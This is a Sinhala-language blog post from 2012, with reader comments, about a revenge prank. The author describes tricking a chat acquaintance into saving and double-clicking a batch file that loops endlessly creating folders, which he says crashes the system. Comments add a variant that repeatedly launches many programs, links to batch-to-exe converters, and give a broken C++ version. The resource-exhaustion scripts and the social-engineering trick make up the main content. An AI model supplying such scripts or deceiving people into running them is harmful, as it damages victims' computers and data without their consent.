Monday, August 6, 2012

ආතල් එකට හදපු වයිරස් එක මුලු සිස්ටම් එකම ක්‍රෑෂ් කරන වයිරස් එකක් වෙලා... ;) (කොම්පියුටර් ජිල්මාට්ස් පාට් නම්බර් ටුවෙන්ටී)

මූණු පොතේ ඉදන් කොල්ලො කෙල්ලො එක්ක බරටම චැටක් දාන වෙලාවෙ.. එකෙක් මට කින්ඩියට වගේ හෙන ටෝක්ස් වගයක් දැම්ම..ඌ එතන පොර වෙන්න හදනව කියල තේරුණ හින්දම මමත් පැත්තක් ගහල ඌ කියන බයිලෙට හ්ම්ම්ම් කිව්ව මිසක් වචනයක්වත් එළියට හැලුවෙ නෑ.. මම දිගටම ගැටිස්සියො ටිකක් එක්ක චැට.. ගැටිස්සියො නම් කීයක් කියලද..? මේ කාලෙදි ගන්න ආතල් එකක් තමයි, මොකෝ බැන්දම ගන්නයැ, එතකොට ඉතින් ඒකෙන් පිට බැහැනෙ..පිට යනවනම් ඉතින් ඒකටත් ක්‍රම තියනව... ;) ඒකනෙ ඔය ලැගුම් ගුහා තියෙන්නෙ.. ෂිට් ඒ මොන කැත වැඩද..? ඊට වඩා කොච්චර සැපද..? මේ මූණුපොතෙයි ස්කයිප් එකෙයි චැට් එක
මගෙත් කිසි සද්දයක් නැති හින්ද මූ මට ලින්ක් 1ක් එවල තිබුණ මම ඒක දැක්කෙ ඔක්කොම චැට් එක ඉවර උණාම.. මමත් ඉතින් ඒ ලින්ක් එකට ගිහින් ඒක ඩවුන් කල.. පොඩි බැට් ෆයිල් එකක්.. මමත් හරක වගේ ඒක ඩබල් ක්ලික් කලා.. හෙන ගහපි චැට් එක වෙලාවෙදි මේ රෙද්ද කලා නම් මම ලැප පොලේ ගහනව.. මොකෝ ලස්සනට ලව් ටෝක්ස් එලියට එන වෙලාවෙදි නෝට්පෑඩ් එකක් දිගටම දිගටම ඔන් වෙනව කෙලෙවරක් නැතුව.. චැට් එක ඉවර හින්ද ඇතියන්තම් ටාස්ක් මැනේජර් ඕපන් කරල ඒක නවත්ත ගත්ත.. චැට් එකේදි උණානම් ලව් ටෝක්ස් වෙනුවට දිවෙන් එලියට පනින්නෙ අමු තිත්ත පට්ට කුණුහරුප... :ඵ්
ඌටත් රිටන් එක දෙන්න ඕන හින්ද හොද ප්ලෑනක් ගහන්න ජිල්මාට්ස්ගෙ කල්පනාව.. දෙයියො බුදුන් සිහි කරනව වෙනුවට බොක්කෙ ෆ්‍රෙන්ඩ් සොෆ්ට්වෙයාර් ඉන්ජිනියර් කෙනෙක්ට කෝල් කරල කිව්ව සීන් එක... ඌටත් බකස් ගාල හිනා.. සිරාවටම මචෝ මට මූට රිටන් එකක් දෙන්න ඕන මෙ වගේ අවලම් වැඩ නොකරන්න..
ඉතින් ජිල්මාට්ස් ආසයි නෙ නොදන්න රෙද්දවල් ඉගෙන ගන්න.. යාලුවත් එක්කම ගේම අදින්නයි කල්පනාව... ඩිස්ටර්බ් කරන්නෙ නැතිව බලන් හිටපන් නොකිය කිව්වෙ කට කොනේ හිනාවක් රන්දගෙන.. තුහ් නොදෝමකින් කියල කියන්න ජිල්මාට්ස්ගෙ දිව ඇඹරුනා ඒක් සබ්‍ය ටෝක පිට වෙන්න කලින්ම මතිෂ මට කතා කරල කිව්ව වරෙන් වරෙන් මගෙ බොක්ක උඹට කියල නොදෙන දෙයක් මම ලග නැහැ කියල.. නිකම්වත් මගේ කටින් අර වචනෙ එළියට පැන්නනම්.... කොහේ ගියත් දෙයියො මට සලකනව.. මදි නොකියන්න කෙල්ලන්ගෙ ආදරේ... මදි නොකියන්න යාලුවන්ගෙ බැදීම.. මේ හැම දේම...
දවස් දෙකකට පස්සෙ හදපු එක ටෙස්ට් කරන දවස.. හැඩුවෙ පොඩි ෆන් එකක් ගන්න, හැදුනෙ මුලු සිස්ටම් එකම ක්‍රෑෂ් කරන්න.. කොහොමද වැඩේ.. දෙන්නම් පුතෝ බැටේ උඹ මට මින් පස්සෙ අර වගේ අවලම් වැඩ නොකරන්නම..
අහා... අර ඇඹලය ඉන්නව ඔන්ලයින්.. පොඩ්ඩක් හිටපන්..
ජිල්මාට්ස් :  "හලො මචා
... කොහොමද ජීවිතෙ...? අඩෝස් මෙ එක නෙවේ සොරි මචන් එදා උබත් එක්ක චැට් කරන්න උනෙ නැත්තෙ පොඩි ෆන් වඩකට අත තිබ්බ බන්ස්..."
x: "ඈ...මොකක්ද බන් ඒ ෆන් වැඩේ.. අපිත් කැමතියි දැනගන්න.. :) "
ජිල්මාට්ස් : " ඔහෝ... උබට කියන්නම් හැබැයි මේක කාටවත් කියල දෙනව එහෙම නෙවෙයි හරිද...?"
x:  "හරි හරි බන් කියපන්කො.."
ජිල්මාට්ස් : "මෙන්න මේක notepad එකේ ලියපන්කො එහෙනම්"
@echo off
: hell
md %random%
goto hell

x: "හරි මචන් ලිව්ව..මොකක්ද බන් මේ රෙද්ද..? මට තෙරෙන්නෙ නැහැ බන්"
ජිල්මාට්ස් :උඹේ OS එක XP නේද...?
x: ඔව් බන්
ජිල්මාට්ස් : "හරි හරි දැන් ඕක උබේ නම .bat දීල විදියට කරපන්කො.. ඉන්පස්සෙ ඕක උඩ ඩබල් ක්ලික් කරපන්"
ජිල්මාට්ස් : මචෝ මට නිදි මතයි බන්ස්... මම යනවෝ... කොම්පියුටරේ හදා ගත්තු දවසක චැට් කරමුකො... මම ගියා එහෙනම්..."
අන්තිමේදි කියපු වචනෙ දැක්කෙ නැද්ද තේරුණේ නැද්ද මන්ද් ඌ මට බායි කියලත් කිව්ව..
ඌ මගේ බ්ලොග් එක දිගටම බැලුවනම් ෆෝමැට් නොකර කරප්ටඩ් ෆයිල්ස් ගොඩදා ගනීවි.. නැත්නම් ෆෝමැට් පාරක් හරි රෙපෙයාර් පාරක් හරි දා ගනීවි.. ෆෝමැට් නොකර කරප්ටඩ් ෆයිල්ස් ගොඩදා ගන්න හැටි මතකද...?
http://www.jilmarts.blogspot.com/2012/07/corrupted-windows-files.html

8 comments:

  1. ube virus ekata maara diga script ekakne ban thiyenne...

    ReplyDelete
  2. පව් යකෝ! බැට් ආතල් නම් එමටයි! හිකිස්!

    ReplyDelete
    Replies
    1. මොන පවක්ද බන්... සිගිති ආතල් එකක් ගත්තෙ.. ඒත් වැඩේ බරපතලම වෙලා... :D

      Delete
  3. ඌ එවපු එක තව ටිකක් advance කරලා දෙන්නම්. මේක(winword, mspaint වගේම තව ඕන තරමක් progam වල exe එකේ නම දාලා) notepad එකේ ගහලා .bat වලට save කරගන්න. ඊටපස්සේ ඕනෑනම් converter එකකින් ඒක exe වලට හරවගන්න(http://www.battoexeconverter.com/ නැත්නම් http://www.softpedia.com/progDownload/Batch-To-Exe-Converter-Download-44026.html)


    @echo off
    :x
    start winword
    start mspaint
    start notepad
    start write
    start cmd
    start explorer
    start control
    start calc
    goto 1



    x වලට කැමති ගානක් දාලා බලන්න. %random% කියලා ගැහුවොත් මම හිතන්නෙ ඒක අරවගේ දිගටම දුවයි........

    ReplyDelete
  4. machan windows 7 valata set vena ekak nadda? puluvannam diyanko ... patta karadara karayek innava.

    ReplyDelete
  5. මචං මෙකම  C++ වලින් ලිව්වම මෙක exe virus ඵකක් වෙනවා. මෙන්න codes..
    #include
    using namespace std;
    int main(){
    system(":hell");
    system("mkdir %random%");
    system("goto hell");
    }

    දැන් මෙක compile කරාම exe virus ළුකක් තමයි.
    ළු උනාට මෙකෙ අයිතිය තියෙන්නෙ ජිලාටම තමයි.
    අදහස ඒයාගෙනෙ...

    ReplyDelete
  6. fatta hode win 7 walata nadda ?

    ReplyDelete